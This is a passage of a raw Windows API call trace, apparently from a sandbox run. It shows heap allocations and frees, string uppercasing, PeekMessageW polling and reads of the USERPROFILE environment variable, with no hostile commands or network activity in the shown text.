CharUpperBuffW (in: lpsz="A2100602512", cchLength=0xb | out: lpsz="A2100602512") returned 0xb [0149.149] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c10 | out: hHeap=0x2af0000) returned 1 [0149.149] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0149.149] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0149.149] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72358 [0149.149] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0149.149] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0149.149] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72338 [0149.149] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0149.149] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0149.149] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722f8 [0149.149] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9058 [0149.149] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722f8 | out: hHeap=0x2af0000) returned 1 [0149.149] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a683a8 [0149.149] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72318 [0149.150] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0149.150] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90e8 [0149.150] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0149.150] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9268 [0149.150] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9298 [0149.150] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90e8 | out: hHeap=0x2af0000) returned 1 [0149.150] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa92c8 [0149.150] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721d8 [0149.150] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf3a8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0149.150] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92e0 [0149.150] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77af8 [0149.150] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721e8 [0149.150] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0149.150] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a683a8 | out: hHeap=0x2af0000) returned 1 [0149.150] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72318 | out: hHeap=0x2af0000) returned 1 [0149.150] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9298 | out: hHeap=0x2af0000) returned 1 [0149.150] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9268 | out: hHeap=0x2af0000) returned 1 [0149.150] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92c8 | out: hHeap=0x2af0000) returned 1 [0149.150] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0149.150] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9058 | out: hHeap=0x2af0000) returned 1 [0149.150] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0149.150] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0149.150] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721f8 [0149.150] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6f20 [0149.150] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0149.150] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x90) returned 0x2a683a8 [0149.150] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77af8 | out: hHeap=0x2af0000) returned 1 [0149.150] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0149.150] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722f8 [0149.151] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722f8 | out: hHeap=0x2af0000) returned 1 [0149.151] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0149.151] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0149.151] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f20 | out: hHeap=0x2af0000) returned 1 [0149.151] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721f8 | out: hHeap=0x2af0000) returned 1 [0149.151] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0149.151] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a722d8 [0149.151] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0149.151] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722c8 [0149.151] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90e8 [0149.151] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0149.151] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72348 [0149.151] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0149.151] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0149.151] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a68440 [0149.151] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722f8 [0149.151] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0149.151] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9268 [0149.151] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9298 [0149.151] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa92c8 [0149.151] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92f8 [0149.151] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9268 | out: hHeap=0x2af0000) returned 1 [0149.151] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9268 [0149.151] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72328 [0149.151] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf3a8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0149.151] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9310 [0149.151] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c60 [0149.151] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72338 [0149.151] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72328 | out: hHeap=0x2af0000) returned 1 [0149.152] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a68440 | out: hHeap=0x2af0000) returned 1 [0149.152] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722f8 | out: hHeap=0x2af0000) returned 1 [0149.152] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92f8 | out: hHeap=0x2af0000) returned 1 [0149.152] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92c8 | out: hHeap=0x2af0000) returned 1 [0149.152] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9268 | out: hHeap=0x2af0000) returned 1 [0149.152] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9298 | out: hHeap=0x2af0000) returned 1 [0149.152] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0149.152] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0149.152] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90e8 | out: hHeap=0x2af0000) returned 1 [0149.152] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722f8 [0149.152] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7020 [0149.152] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9268 [0149.152] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xa0) returned 0x2a68440 [0149.152] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c60 | out: hHeap=0x2af0000) returned 1 [0149.152] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9268 | out: hHeap=0x2af0000) returned 1 [0149.152] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0149.152] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0149.152] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7020 | out: hHeap=0x2af0000) returned 1 [0149.152] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722f8 | out: hHeap=0x2af0000) returned 1 [0149.152] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722c8 | out: hHeap=0x2af0000) returned 1 [0149.152] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72328 [0149.152] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0149.152] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72368 [0149.152] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92c8 [0149.152] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0149.152] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72348 [0149.152] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90e8 [0149.152] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72388 [0149.153] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0149.153] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa92f8 [0149.153] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77bc0 [0149.153] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0149.153] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721f8 [0149.153] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0149.153] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c60 [0149.153] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9328 [0149.153] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9040 [0149.153] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e18 [0149.153] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9058 [0149.153] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72248 [0149.153] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9058 | out: hHeap=0x2af0000) returned 1 [0149.153] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b98 [0149.153] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0149.153] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9268 [0149.153] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77af8 [0149.153] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9298 [0149.153] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72318 [0149.153] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9298 | out: hHeap=0x2af0000) returned 1 [0149.153] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b70 [0149.153] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9298 [0149.153] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9058 [0149.153] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f30 [0149.153] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9430 [0149.153] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721b8 [0149.153] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9430 | out: hHeap=0x2af0000) returned 1 [0149.153] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e90 [0149.153] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9460 [0149.153] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0149.154] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0149.154] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72208 [0149.154] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72368 [0149.154] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa94d8 [0149.154] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9520 [0149.154] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72218 [0149.154] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9430 [0149.154] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0149.154] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722f8 [0149.154] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cd8 [0149.154] CharUpperBuffW (in: lpsz="SSA2100602512", cchLength=0xd | out: lpsz="SSA2100602512") returned 0xd [0149.154] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cd8 | out: hHeap=0x2af0000) returned 1 [0149.154] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722f8 | out: hHeap=0x2af0000) returned 1 [0149.154] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9430 | out: hHeap=0x2af0000) returned 1 [0149.154] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9520 | out: hHeap=0x2af0000) returned 1 [0149.154] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa94d8 | out: hHeap=0x2af0000) returned 1 [0149.154] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0149.154] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72208 | out: hHeap=0x2af0000) returned 1 [0149.154] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ec40 [0149.155] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0149.155] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ec40 | out: hHeap=0x2af0000) returned 1 [0149.155] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0149.155] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9478 [0149.155] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72208 [0149.155] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9478 | out: hHeap=0x2af0000) returned 1 [0149.155] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77da0 [0149.155] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa94d8 [0149.155] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9430 [0149.155] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72218 [0149.155] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b20 [0149.155] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9568 [0149.155] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721a8 [0149.156] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9568 | out: hHeap=0x2af0000) returned 1 [0149.156] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f58 [0149.156] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9520 [0149.156] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9568 [0149.156] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa94d8 | out: hHeap=0x2af0000) returned 1 [0149.156] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9478 [0149.156] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9598 [0149.156] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721d8 [0149.156] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d50 [0149.156] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9448 [0149.156] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72228 [0149.156] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9448 | out: hHeap=0x2af0000) returned 1 [0149.156] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c88 [0149.156] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9610 [0149.156] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9448 [0149.156] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77da0 | out: hHeap=0x2af0000) returned 1 [0149.156] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72208 | out: hHeap=0x2af0000) returned 1 [0149.156] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9478 | out: hHeap=0x2af0000) returned 1 [0149.156] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0149.156] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9478 [0149.156] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72238 [0149.156] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9478 | out: hHeap=0x2af0000) returned 1 [0149.156] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d00 [0149.156] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9478 [0149.156] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9538 [0149.156] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72368 [0149.156] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d28 [0149.156] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95b0 [0149.156] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72258 [0149.156] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95b0 | out: hHeap=0x2af0000) returned 1 [0149.156] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f08 [0149.157] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95b0 [0149.157] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa94d8 [0149.157] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72268 [0149.157] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9478 | out: hHeap=0x2af0000) returned 1 [0149.157] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9478 [0149.157] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0149.157] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72208 [0149.157] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa108 [0149.157] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72208 | out: hHeap=0x2af0000) returned 1 [0149.157] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa108 | out: hHeap=0x2af0000) returned 1 [0149.157] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0149.157] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9478 | out: hHeap=0x2af0000) returned 1 [0149.157] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0149.157] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9538 | out: hHeap=0x2af0000) returned 1 [0149.157] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0149.157] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa94d8 | out: hHeap=0x2af0000) returned 1 [0149.157] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9478 [0149.157] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa94d8 [0149.157] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722f8 [0149.157] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ad0 [0149.157] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9538 [0149.157] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72208 [0149.157] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9538 | out: hHeap=0x2af0000) returned 1 [0149.157] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e68 [0149.157] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9538 [0149.157] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0149.157] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72298 [0149.157] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9478 | out: hHeap=0x2af0000) returned 1 [0149.157] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0149.157] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa94d8 | out: hHeap=0x2af0000) returned 1 [0149.158] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722f8 | out: hHeap=0x2af0000) returned 1 [0149.158] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0149.158] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d00 | out: hHeap=0x2af0000) returned 1 [0149.158] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0149.158] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0149.158] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0149.158] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72238 [0149.158] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0149.158] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cb0 [0149.158] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0149.158] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa198 [0149.158] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72378 [0149.158] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77da0 [0149.158] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1c8 [0149.158] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722b8 [0149.158] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1c8 | out: hHeap=0x2af0000) returned 1 [0149.158] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, 